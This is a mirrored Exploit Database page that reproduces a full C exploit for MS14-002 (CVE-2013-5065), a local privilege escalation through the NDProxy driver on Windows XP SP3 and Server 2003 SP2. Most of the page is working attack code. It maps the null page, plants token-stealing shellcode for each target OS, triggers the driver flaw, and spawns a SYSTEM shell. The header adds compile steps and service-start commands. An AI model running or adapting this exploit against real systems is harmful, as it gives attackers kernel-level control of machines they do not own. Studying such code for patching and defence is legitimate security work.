Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) – ‘NDProxy’ Local Privilege Escalation (MS14-002)

• Exploit Database
• 20 阅读

• 作者： Tomislav Paskalev
  日期： 2015-08-07
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/37732/

• /*
  ################################################################
  # Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
  # Date: 2015-08-03
  # Exploit Author: Tomislav Paskalev
  # Vulnerable Software:
  # Windows XP SP3 x86
  # Windows XP SP2 x86-64
  # Windows 2003 SP2 x86
  # Windows 2003 SP2 x86-64
  # Windows 2003 SP2 IA-64
  # Supported vulnerable software:
  # Windows XP SP3 x86
  # Windows 2003 SP2 x86
  # Tested on:
  # Windows XP SP3 x86 EN
  # Windows 2003 SP2 x86 EN
  # CVE ID: 2013-5065
  ################################################################
  # Vulnerability description:
  # NDPROXY is a system-provided driver that interfaces WAN
  # miniport drivers, call managers, and miniport call managers
  # to the Telephony Application Programming Interfaces (TAPI)
  # services.
  # The vulnerability is caused when the NDProxy.sys kernel
  # component fails to properly validate input.
  # An attacker who successfully exploited this vulnerability
  # could run arbitrary code in kernel mode (i.e. with SYSTEM
  # privileges).
  ################################################################
  # Exploit notes:
  # Privileged shell execution:
  # - the SYSTEM shell will spawn within the existing shell
  # (i.e. exploit usable via a remote shell)
  # Exploit compiling:
  # - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
  # Exploit prerequisites:
  # - low privilege access to the target (remote shell or RDP)
  # - target not patched (KB2914368 not installed)
  # - service "Routing and Remote Access" running on the target
  # - "Power User" user group can start and stop services
  # - > sc query remoteaccess
  # - > sc start remoteaccess
  ################################################################
  # Thanks to:
  # Andy (C PoC - Win XP SP3)
  # ryujin (Python PoC - Win XP SP3)
  ################################################################
  # References:
  # http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
  # https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
  # https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
  # https://www.exploit-db.com/exploits/30014/
  # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
  # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
  # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
  # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
  ################################################################
  */
  
  #include <windows.h>
  #include <stdio.h>
  #include <stdlib.h>
  
  
  
  typedef struct {
  PVOID Unknown1;
  PVOID Unknown2;
  PVOID Base;
  ULONG Size;
  ULONG Flags;
  USHORTIndex;
  USHORTNameLength;
  USHORTLoadCount;
  USHORTPathLength;
  CHARImageName[256];
  } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
  
  
  typedef struct {
  ULONG Count;
  SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
  } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
  
  
  typedef enum _SYSTEM_INFORMATION_CLASS {
  SystemModuleInformation = 11,
  SystemHandleInformation = 16
  } SYSTEM_INFORMATION_CLASS;
  
  
  typedef DWORD NTSTATUS;
  NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
   PVOID SystemInformation,
   ULONG SystemInformationLength,
   PULONG ReturnLength);
  
  
  
  static VOID InitFirstPage (void)
  {
  PVOID BaseAddress;
  ULONG RegionSize;
  NTSTATUS ReturnCode;
  FARPROC NtAllocateVirtualMemory;
  
  NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
  
  fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
  RegionSize = 0xf000;
  BaseAddress = (PVOID) 0x00000001;
  ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
   &BaseAddress,
  	 0,
   &RegionSize,
   MEM_COMMIT | MEM_RESERVE,
   PAGE_EXECUTE_READWRITE);
  if (ReturnCode != 0)
  {
   fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
   fprintf (stderr, "Error code: %#X\n", ReturnCode);
   fflush (stderr);
   ExitProcess (1);
  }
  fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
  FillMemory (BaseAddress, RegionSize, 0x41);
  return;
  }
  
  
  
  int exploit (unsigned char *shellcode)
  {
  DWORD writtenBytes;
  int returnValue;
  
  InitFirstPage ();
  
  unsigned char *shellcodeBuffer;
  shellcodeBuffer = (char *) malloc (400);
  memset (shellcodeBuffer, (int) "xCC", 400);
  memcpy (shellcodeBuffer, shellcode, 112);
  
  returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
  if (returnValue == 0)
  {
  printf ("[-] Attempt to map memory_write failed\n");
  printf ("Error code: %d\n", GetLastError ());
  exit(1);
  }
  HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
  if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
  {
  printf ("[-] Creating a device handle on NDProxy failed\n");
  printf ("Error code: %d\n", GetLastError());
  exit (0);
  }
  DWORD inputBuffer [0x15] = {0};
  DWORD returnedBytes = 0;
  *(inputBuffer + 5) = 0x7030125;
  *(inputBuffer + 7) = 0x34;
  DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
  CloseHandle (ndProxyDeviceHandle);
  system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
  return 0;
  }
  
  
  
  int main (int argc, char **argv)
  {
  if (argc != 2)
  {
  printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
  printf (" supported OS_TYPE:\n");
  printf ("XP- Windows XP SP3 x86\n");
  printf ("2k3 - Windows 2003 SP2 x86\n");
  printf ("[*] Note:the service \"Routing and Remote Access\"\n");
  printf (" must be running on the target machine\n");
  exit (0);
  }
  else
  {
  if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
  {
  unsigned char shellcodeXP[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
  "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
  "\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
  "\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
  exploit (shellcodeXP);
  }
  else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
  {
  unsigned char shellcode2k3[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
  "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
  "\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
  "\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
  exploit (shellcode2k3);
  }
  else
  {
  printf ("[-] Invalid argument\n");
  printf ("Argument used: %s\n", argv[1]);
  exit(0);
  }
  }
  }